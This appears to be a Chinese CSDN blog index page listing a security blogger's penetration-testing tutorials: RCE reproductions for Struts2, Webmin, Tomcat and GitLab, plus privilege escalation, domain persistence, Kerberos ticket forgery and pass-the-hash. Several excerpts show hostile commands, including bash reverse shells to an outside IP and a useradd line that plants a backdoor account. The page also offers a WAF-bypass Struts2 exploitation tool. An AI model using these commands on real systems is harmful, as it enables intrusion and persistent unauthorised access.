自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(26)
  • 资源 (1)
  • 收藏
  • 关注

原创 Apache Struts2远程代码执行漏洞(S2-001)复现

0x01 漏洞概述1、漏洞名称漏洞名称:Struts Remote Code Exploit 漏洞编号:Struts2-001漏洞类型:Remote Code Execution2、漏洞原理Struts2 是流行和成熟的基于 MVC 设计模式的 Web 应用程序框架。 Struts2 不只是 Struts1 下一个版本,它是一个完全重写的 Struts 架构。Struts2 的标签中使用的是OGNL表达式,OGNL 是 Object Graphic Navigation Language(

2022-01-14 10:19:43 2459

原创 Webmin未经身份验证的远程代码执行(CVE-2019-15107)

0x01 漏洞详情Webmin是用于类似Unix的系统的基于Web的系统配置工具。该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下执行恶意代码,后经知道创宇404实验室发现,该漏洞的存在实则是sourceforge上某些版本的安装包和源码被植入了后门导致的。0x02 影响版本webmin<=1.9200x03 漏

2022-01-11 15:35:47 3122 2

原创 tomcat7.x远程命令执行(CVE-2017-12615)漏洞利用复现

一、漏洞前言2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险二、漏洞名称CVE-2017-12615-远程代

2022-01-11 15:33:34 4136

原创 CVE-2020-15778漏洞复现

1.漏洞描述(1)简介:2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。该漏洞属于命令执行漏洞,目前绝大多数linux系统受影响。(2)scp介绍:scp是Linux下基于 ssh 登陆进行安全的远程文件拷贝命,用于不同Linux系统之间复制文件和目录。该命令由openssh的scp.c及其他相关代码实现。在本次漏洞复现中就是利用scp命

2021-11-30 19:03:33 2746

原创 MySQL提权

MySQL提权的必要条件:具有MySQL的root权限,且MySQL以system权限运行。 具有执行SQL语句的权限。获取root密码的方法:查看数据库配置文件关键字:config、conn、sql、data、inc、database等 下载mysql安装路径下的数据文件安装路径下的data目录中存放的是数据库的数据信息 root账号密码存储在mysql数据库下的user表中 完整路径=安装路径+\data\mysql\user.MYD 3.暴力破解MySQL数据库提...

2021-11-28 15:15:14 5927

原创 cve-2021-22205复现

漏洞背景描述2021年4⽉15⽇,GitLab官方发布安全补丁更新修复了GitLab命令执行漏洞(CVE-2021- 22205)。由于GitLab中的ExifTool没有对传⼊的图像文件的扩展名进行正确处理,攻击者通过 上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影 响,CVSS评分为9.9。GitLab 是一个基于 Web 的 DevOps 生命周期工具,它提供了一

2021-11-24 21:12:41 991 2

原创 Linux权限维持

一:适配方法1:后门账户###添加普通用户:# 创建一个用户名guest,密码123456的普通用户useradd -p `openssl passwd -1 -salt 'salt' 123456` guest# useradd -p 方法 ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句useradd -p "$(openssl passwd -1 123456)" guest# chpasswd方法useradd guest;echo 'guest:1

2021-11-23 01:22:22 306

原创 Python基础语法

前言导读:Python的创始⼈为吉多·范罗苏姆(Guido van Rossum)。 1989年的圣诞节期间,吉多·范罗苏姆为了了在阿姆斯特丹打发时间,决⼼开发一个新的脚本解释程序,作为ABC语言的一种继承。其诞生于1990年;一:基础常识1.1:认识Python1.1.1:Python能够干什么? 应用方向 描述 网路爬虫 Google 等搜索引擎公司大量地使用 Python 语言编写网络爬虫。 数据

2021-11-23 01:11:40 274

原创 Python爬虫抓取图片到本地

一:目标站点信息彼岸桌面 网址为:桌面壁纸 电脑桌面壁纸 高清壁纸大全下载 桌面背景图片 彼岸桌面二:目标站点分析(1):构造页面的URL列表我们需要做的是爬取网站上给定页数的图片,所以,我们首先需要的就是观察各个页面链接之间的关系,进而构造出需要爬取页面的url列表。第一页的链接:http://www.netbian.com/第二页的链接:http://www.netbian.com/index_2.htm可以看出,从第二页开始之后的页面链接只是后面的数字不同...

2021-11-23 00:23:42 271

原创 代理池应用

Proxifier(不会搭建代理的可以看上一篇教程)思路:通过脚本获取ProxyPool服务器的代理信息并导出至Proxifier的配置文件加载进去并开始扫描软件代理...缺点:代理信息需要实时获取才能够保证质量优点:......步骤一:启动ProxyPool服务并访问验证....需要注意不能够开启Redis服务认证,原因:脚本不支持....步骤二:将一下脚本修改并上传到服务器执行,获取Proxifier配置文件下载到本地# -*- coding:utf8 ...

2021-11-23 00:19:48 3042

原创 ARL资产侦查灯塔系统

一:ARL(Asset Reconnaissance Lighthouse)资产侦察灯塔系统安装教程步骤一:Centos下安装Dockeryum -y install dockeryum -y install docker-composesystem start docker步骤二:拉取镜像文件并启动...docker pull tophant/arlgit clone https://github.com/TophantTechnology/ARLcd ARL/docker/

2021-11-23 00:11:37 3654

原创 Ubuntu安装MSF

1:打开metasploit的官方网站:2:进入github,获取下载地址和方式:2:获取下载地址的方式,直接在ubuntu中执行命令:curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msf

2021-11-23 00:08:46 5359

原创 域渗透-域控维权

一:DSRM后门DSRM ( Directory Services Restore Mode,目录服务恢复模式)是Windows域环境中域控制器的安全模式启动选项。每个域控制器都有一个本地管理员账户 (也就是DSRM账户)。DSRM的用途是:允许管理员在域环境中出现故障或崩溃时还原、修复、重建活动目录数据库,使域环境的运行恢复正常。在域环境创建初期,DSRM的密码需要在安装DC时设置,且很少会被重置。修改DSRM密码最基本的方法是在DC上运行ntdsutil 命令行工具。在渗透测试中,可以使用DSR

2021-11-20 17:33:23 1199

原创 Kerberos域认证简述

Kerberos是一种认证机制。目的是通过密钥系统为客户端/服务器应用程序提供强大的可信任的第三方认证服务:保护服务器防止错误的用户使用,同时保护它的用户使用正确的服务器,即支持双向验证。kerberos最初由MIT麻省理工开发,微软从Windows 2000开始支持Kerberos认证机制,将kerberos作为域环境下的主要身份认证机制,理解kerberos认证协议是域渗透的基础。1.1:Kerberos认证框架kerberos机制中主要包含三个角色:Client、Server、KDC(Ke

2021-11-20 09:37:50 2596

原创 PTT之白银票据

白银票据原理如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。在Kerberos认证的第三大步,Client带着ST和Authenticator3向域上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪...

2021-11-20 09:34:59 706

原创 PTT之黄金票据

3.1:黄金票据原理在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个Session key_AS和TGT,而Session key_AS并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash(也就是KDC hash),就可以伪造TGT和Session key_AS来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。因为krbtgt只有域控

2021-11-20 09:30:23 255

原创 Pass The Hash攻击原理

验证的整个过程中缺少了一样重要的东西,也就是在故事背景中埋下过的一个小伏笔:windows本身不存储明文密码。***PTH原理***根据结果逆推:如果需要正确的response(蓝色)来通过认证,因为response本质上也是Net NTLM Hash(红色)根据公式“Net NTLM Hash = NTLM Hash(Challenge)”,我们需要正确的NTLM Hash(黄色)和Challenge(绿色)。而由于Challenge是服务端发送给,只要我们拥有正确的NTLM Hash,即可通过认

2021-11-20 09:24:53 605

原创 域渗透-横向移动(PTH)

一:Windows本地认证***基础知识***Windows内部是不保存明文密码的,只保存密码的hash。 本机用户的密码hash是放在本地的SAM文件 里面,域内用户的密码hash是存在域控的NTDS.DIT文件里面。SAM文件位置:%SystemRoot%\system32\config\sam 当我们登录系统的时候,系统会自动地读取SAM文件中的“密码”与我们输入的“密码”进行对比,如果相同,则认证成功。***密码格式***Administrator:500:AAD3B435B5

2021-11-20 09:21:51 281

原创 Metasploit

Metasploit是The Metasploit Framework的简称,也可以叫做MSF! MSF高度模块化即框架由多个module组成,是全球最受欢迎的工具。Metasploit Framework(MSF)远远不仅仅是一个漏洞的集合。这是您可以建立和利用您的自定义需求的基础架构。这使您可以专注于您独特的环境,而不必重新发明轮子。官网地址:Metasploit | Penetration Testing Software, Pen Testing Security | Metasploit

2021-11-20 09:10:47 657

原创 CVE-2019-5736:Docker逃逸漏洞

一:概述2019年2月11日,runC的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现。该漏洞编号为CVE-2019-5736,漏洞影响在默认设置下运行的Docker容器,并且攻击者可以使用它来获得主机上的root级访问权限。二:漏洞原理漏洞点在于runC,RunC是一个容器运行时,最初是作为Docker的一部分开发的,后来作为一个单独的开源工具和库被提取出来。作为“低级别”容器运行时,runC主要由“高级别”容器运行时(例如Docker

2021-11-18 09:32:24 403 1

原创 内核溢出提权

介绍Windows内核溢出漏洞提权通过系统本身存在的一些漏洞,未曾打相应的补丁而暴露出来的提权方法,依托可以提升权限的EXP和它们的补丁编号,进行提升权限;本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。通常利用内核提权步骤如下: 信息收集(查看当前权限,查看版本,补丁等); 根据收集到的信息确定可利用漏洞; 根据漏洞查找EXP; 使用EXP提

2021-11-17 22:20:35 368

原创 命令行/终端下载指令大全

一:Linux###Wget这款工具功能很丰富,可以充当某种功能完备的GUI下载管理器,它拥有一款理想的下载管理器所需要的所有功能,比如它可以恢复下载,可以下载多个文件,出现某个连接问题后,可以重新尝试下载,你甚至可以管理最大的下载带宽。直接下载wget http://www.sample-videos.com/video/mp4/big.mp4后台下载wget -b http://www.sample-videos.com/video/mp4/big.mp4如果互联网连接出现中断,

2021-11-17 22:15:35 1789 1

原创 各语言起HTTP服务

PythonPython <= 2.3python -c "import SimpleHTTPServer as s; s.test();" 8000Python >= 2.4python -m SimpleHTTPServer 8000Python 3.xpython -m http.server 8000Python (Twisted)pip install twistedtwistd -n web -p 8000 --path .python -c 'f

2021-11-17 22:08:34 638

原创 内网信息收集

一:工作组信息收集1.1:本机信息收集系统systeminfo #查看系统信息systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #查看系统及版本,英文系统systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" #查看系统及版本,中文系统echo %PROCESSOR_ARCHITEC...

2021-11-17 22:05:34 999

原创 各种反弹shell方式

1、Bash环境下反弹TCP协议shell首先在本地监听TCP协议443端口nc -lvp 443然后在靶机上执行如下命令:1bash -i >& /dev/tcp/121.40.248.82/1234 0>&11/bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&11exec 5<>/dev/tcp/10.10.10.11/443;ca.

2021-11-17 21:53:22 2313

原创 永恒之蓝漏洞复现

简介该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。————————————————版权声明:本文为CSDN博主「RDrug」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blo

2021-10-10 13:07:49 1176

Struts 2 全版本漏洞检测工具 18.09 过waf版.jar

struts2全版本检测,利用工具

2022-01-14

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除